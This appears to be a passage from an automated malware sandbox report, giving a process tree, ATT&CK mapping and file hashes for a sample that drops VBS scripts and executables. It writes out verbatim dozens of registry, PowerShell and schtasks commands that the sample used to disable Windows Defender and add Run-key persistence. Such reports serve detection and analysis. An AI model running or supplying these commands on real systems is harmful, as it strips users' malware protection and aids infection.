C:\Windows\SysWOW64\explorer.exe"C:\Windows\System32\explorer.exe" C:\Users\Admin\AppData\Local\Execution.vbs4⤵
- System Location Discovery: System Language Discovery
PID:1400
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution2.vbs"4⤵
- Adds Run key to start application
- Drops file in System32 directory
- System Location Discovery: System Language Discovery
PID:6040
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution5.vbs"4⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Modifies registry class
PID:3380 -
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:4580
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:3336
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:6104
-
-
C:\Windows\SysWOW64\Images.exe"C:\Windows\SysWOW64\Images.exe"5⤵
- Executes dropped EXE
- System Location Discovery: System Language Discovery
PID:2236
-
-
        [5] C:\Windows\SysWOW64\Images.exe  "C:\Windows\SysWOW64\Images.exe"  PID 3372
        [5] C:\Windows\SysWOW64\Images.exe  "C:\Windows\SysWOW64\Images.exe"  PID 6016
        [5] C:\Windows\SysWOW64\Images.exe  "C:\Windows\SysWOW64\Images.exe"  PID 5648
        [5] C:\Windows\SysWOW64\Images.exe  "C:\Windows\SysWOW64\Images.exe"  PID 5836
        [5] C:\Windows\SysWOW64\Images.exe  "C:\Windows\SysWOW64\Images.exe"  PID 2240
        [5] C:\Windows\SysWOW64\Images.exe  "C:\Windows\SysWOW64\Images.exe"  PID 5816
        [5] C:\Windows\SysWOW64\Images.exe  "C:\Windows\SysWOW64\Images.exe"  PID 3672
        [5] C:\Windows\SysWOW64\Images.exe  "C:\Windows\SysWOW64\Images.exe"  PID 860
        [5] C:\Windows\SysWOW64\Images.exe  "C:\Windows\SysWOW64\Images.exe"  PID 3848
        [5] C:\Windows\SysWOW64\Images.exe  "C:\Windows\SysWOW64\Images.exe"  PID 388
        [5] C:\Windows\SysWOW64\Images.exe  "C:\Windows\SysWOW64\Images.exe"  PID 1532
        [5] C:\Windows\SysWOW64\Images.exe  "C:\Windows\SysWOW64\Images.exe"  PID 5988
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f  PID 3020
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f  PID 1520
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f  PID 1784
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f  PID 3336
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" / t REG_DWORD /d "0" /f  PID 2784
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableBehaviorMonitoring" /t REG_DWORD /d "1" /f  PID 884
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableIOAVProtection" /t REG_DWORD /d "1" /f  PID 932
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableOnAccessProtection" /t REG_DWORD /d "1" /f  PID 4408
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableRealtimeMonitoring" /t REG_DWORD /d "1" /f  PID 4696
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Real-Time Protection" /v "DisableScanOnRealtimeEnable" /t REG_DWORD /d "1" /f  PID 896
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\Reporting" /v "DisableEnhancedNotifications" /t REG_DWORD /d "1" /f  PID 3992
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "DisableBlockAtFirstSeen" /t REG_DWORD /d "1" /f  PID 5844
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SpynetReporting" /t REG_DWORD /d "0" /f  PID 5528
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Policies\Microsoft\Windows Defender\SpyNet" /v "SubmitSamplesConsent" /t REG_DWORD /d "2" /f  PID 860
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderApiLogger" /v "Start" /t REG_DWORD /d "0" /f  PID 3208
          - Command and Scripting Interpreter: PowerShell
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Control\WMI\Autologger\DefenderAuditLogger" /v "Start" /t REG_DWORD /d "0" /f  PID 4396
          - Command and Scripting Interpreter: PowerShell
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\ExploitGuard\ExploitGuard MDM policy Refresh" /Disable  PID 780
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cache Maintenance" /Disable  PID 4240
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Cleanup" /Disable  PID 5888
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Scheduled Scan" /Disable  PID 3004
          - System Location Discovery: System Language Discovery
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" schtasks /Change /TN "Microsoft\Windows\Windows Defender\Windows Defender Verification" /Disable  PID 4520
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Explorer\StartupApproved\Run" /v "SecurityHealth" /f  PID 4192
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKLM\Software\Microsoft\Windows\CurrentVersion\Run" /v "SecurityHealth" /f  PID 4560
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\*\shellex\ContextMenuHandlers\EPP" /f  PID 3572
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Directory\shellex\ContextMenuHandlers\EPP" /f  PID 3996
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg delete "HKCR\Drive\shellex\ContextMenuHandlers\EPP" /f  PID 3448
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdBoot" /v "Start" /t REG_DWORD /d "4" /f  PID 5468
          - Command and Scripting Interpreter: PowerShell
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdFilter" /v "Start" /t REG_DWORD /d "4" /f  PID 1172
          - Command and Scripting Interpreter: PowerShell
          - System Location Discovery: System Language Discovery
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisDrv" /v "Start" /t REG_DWORD /d "4" /f  PID 5668
          - Command and Scripting Interpreter: PowerShell
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WdNisSvc" /v "Start" /t REG_DWORD /d "4" /f  PID 3052
          - Command and Scripting Interpreter: PowerShell
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\System\CurrentControlSet\Services\WinDefend" /v "Start" /t REG_DWORD /d "4" /f  PID 4928
          - Command and Scripting Interpreter: PowerShell
      [4] C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe  "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" reg add "HKLM\Software\Microsoft\Windows Defender\Features" /v "TamperProtection" /t REG_DWORD /d "0" /f  PID 4940
    [3] C:\Windows\SysWOW64\cmd.exe  C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\乃メᄃフ乙W乃のムム乙キゐリレム.bat" "  PID 3680
        - System Location Discovery: System Language Discovery
        - Suspicious use of WriteProcessMemory
      [4] C:\Windows\SysWOW64\chcp.com  chcp 65001  PID 2816
          - System Location Discovery: System Language Discovery
      [4] C:\Windows\SysWOW64\PING.EXE  ping -\Common 10 localhost  PID 4756
          - System Location Discovery: System Language Discovery
          - System Network Configuration Discovery: Internet Connection Discovery
          - Runs ping.exe
      [4] C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe  "C:\Users\Admin\AppData\Local\Temp\Gptmvmjkvvg.exe"  PID 3244
          - Executes dropped EXE
          - System Location Discovery: System Language Discovery
  [2] C:\Users\Admin\AppData\Local\Temp\Oajujxo.exe  "C:\Users\Admin\AppData\Local\Temp\Oajujxo.exe"  PID 5944
      - Executes dropped EXE
      - System Location Discovery: System Language Discovery
      - Suspicious use of AdjustPrivilegeToken
[1] C:\Windows\explorer.exe  C:\Windows\explorer.exe /factory,{75dff2b7-6936-4c06-a8bb-676a7b00b24b} -Embedding  PID 460
    - Modifies registry class
  [2] C:\Windows\System32\WScript.exe  "C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Local\Execution.vbs"  PID 680
      - Adds Run key to start application
[1] C:\Windows\system32\cmd.exe  C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\Images.exe  PID 3252
[1] C:\Windows\system32\cmd.exe  C:\Windows\system32\cmd.exe /c C:\Windows\SysWOW64\Images.exe  PID 5920
[1] C:\Windows\System32\svchost.exe  C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s Netman  PID 2192
Network

MITRE ATT&CK Enterprise v15
Execution
  Command and Scripting Interpreter (2)
    PowerShell (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Persistence
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Privilege Escalation
  Boot or Logon Autostart Execution (1)
    Registry Run Keys / Startup Folder (1)
  Scheduled Task/Job (1)
    Scheduled Task (1)
Defense Evasion
  Indicator Removal (1)
    File Deletion (1)
  Modify Registry (2)
  Virtualization/Sandbox Evasion (1)
Downloads
- Filesize 395B
  MD5    ed60a6e229318430f77c588101134ab3
  SHA1   999aca0f516558c0ce3b501b0e0ac172c1304161
  SHA256 5cc8563947de29db37a6c6eda475c993246f054f56ddc34893ccaef9188f10b9
  SHA512 dc6ee59d582cec837eb89b9327f08da60980dcdde3c6ce4c6a6a20b59ecfda3b6a5a9e2d17b06536172a0c5d1cd739a81fb899ca4c86996d823daa1407abdea3
- Filesize 711B
  MD5    165f73dc3352b322003dac336356a4dd
  SHA1   db064f1272024f22892e4164d3d90f08d47776a9
  SHA256 cfe26c1974b281174e137a76720270b1a1b46529974d35a0ca0e7d436cab9e4c
  SHA512 2c09f15443eff40940ccabcc1642f65af057bb9de1a9e884ba8cfe854b3e40e1fee3af29307dfb8c916aafeb0e8cdfbd7c6b90ddcc1b9c1c664ce488c483bf31
- Filesize 443B
  MD5    82d0aab78d68e662a3c836e45a50283e
  SHA1   a58dfc74331ce3958a021b02060f3e05523ed755
  SHA256 442ea26f0245897bda778c22b58c76d34e402e3c5f31af550bfb161c5febd633
  SHA512 ddf0d379bbd3d1dbb3ffb75a9dccf7c9e29b8562cf1674fb3d0a75112382849d0d6e3aae35115925ef4215aca2d6e98d9a522e95ac443c8d7a76f8132165507a
- Filesize 1KB
  MD5    63fea3bd8920a554c9385940d9c29568
  SHA1   fec70ace9502b07386d4317f99653c194e6dd72b
  SHA256 26c534c65e7f9e68328374bb0e6436e3c96bd92ccad33e271446e09ae395f3b3
  SHA512 afecd3b158836ff3f11984d60eaabe1e0072471301e30aa997e6e09614a279a1f4852d9e0da5b4ec8b2330378b67177db1cbad6890ab33d29d8b3dd693dbca09
- Filesize 701B
  MD5    b8f25807f2c2d5d9f1b724c5c1fbebd9
  SHA1   f97aca350fdee3994376fb49c075f6b992504758
  SHA256 e2281b4d79ea1305d702fc3ae3d9d78f51fbafd7e32480f545cc2fc5ae0e4537
  SHA512 f97b860992024b69544f685465894ff9125a9fa7ee480b97288f9545acba2a80dd5dbd0b14e7463348503bbf65863ccd71fa94efc57350ffb8744c7a9e0ba392
- Filesize 916KB
  MD5    20e5bc2c26788de1138995f9fa2ad7c5
  SHA1   4f909c814bba89f6058222d2658cc2123b39c463
  SHA256 594c9dc2d16dca813d55528ec60f84711ca58e828818eb31d42d8d99690eba44
  SHA512 5c634f834200ce33e8f1ab3e79ba34dc4ac28af780e6cfd4884abefdde85a14d006c0046a658843bd44baf29bb88700e764bcf4000a258edbfff96b533b66bde
- Filesize 3.2MB
  MD5    2ed95abbfe15c8d0f125b64d8687faa2
  SHA1   37b83c14d0c89d7d328a7954b415cff8b0ce257a
  SHA256 5e8c4b41430a6ee2d3f72ddd41a5a9f5e6484a8ee143b404e1f45ca645802f30
  SHA512 f3e44541ecd5688795e44d8a27d7d968d54d84acdb94b707ad911a6635d0186f73efcaf2128946dcc7e8984bf3a0049ee33a048bb0127b1185a827e20eb4a575
- Filesize 95KB
  MD5    8f9a88eab3424835c4c3cd45142c1da1
  SHA1   a85396cdd944f2f486597a65f8a46425922c30c0
  SHA256 2efec2e1440efee7fb641d8468d6676456197eb50ef49236c081e0827f455909
  SHA512 10a625ea39d82707bfe94d35551818410d5564d1562d59b2e624b2ba29683732e434cd62694dbb681e31d67e2af750147c400dba63db088a4a8ee09326807b95
- Filesize 587B
  MD5    ed9315b3f8b61567cba6abaa0c996599
  SHA1   c36f5bfbb4cc4a7e0b035bb60b938e41548df566
  SHA256 77409a1eec6c53740a5e35b580215dfbf38496d03fdfac0426e71544cde7239e
  SHA512 777fee00cb0fa3075ceba83eedc06bb06d9058517ee617d74df88b398b92943d15913497ffc1dee0a3d86096a2cef160d12159cbc3299253dc0d09fa92b03b9c